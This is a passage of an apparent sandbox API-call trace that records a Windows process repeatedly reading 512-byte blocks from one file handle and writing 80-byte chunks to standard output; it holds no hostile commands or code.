lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.988] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.988] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] GetFileType (hFile=0x50) returned 0x1 [0194.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.988] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.989] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.989] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.989] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] GetFileType (hFile=0x50) returned 0x1 [0194.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.990] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.990] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.990] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.991] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] GetFileType (hFile=0x50) returned 0x1 [0194.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.991] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.992] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.992] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] GetFileType (hFile=0x50) returned 0x1 [0194.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.992] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] GetFileType (hFile=0x50) returned 0x1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] GetFileType (hFile=0x50) returned 0x1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] GetFileType (hFile=0x50) returned 0x1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] GetFileType (hFile=0x50) returned 0x1 [0194.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.993] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.993] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.006] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.006] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.006] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] GetFileType (hFile=0x50) returned 0x1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] GetFileType (hFile=0x50) returned 0x1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] GetFileType (hFile=0x50) returned 0x1 [0195.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.006] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.007] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.007] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] GetFileType (hFile=0x50) returned 0x1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.007] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.008] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.008] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.008] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] GetFileType (hFile=0x50) returned 0x1 [0195.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.009] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.009] _get_osfhandle (_FileHandle=1) returned 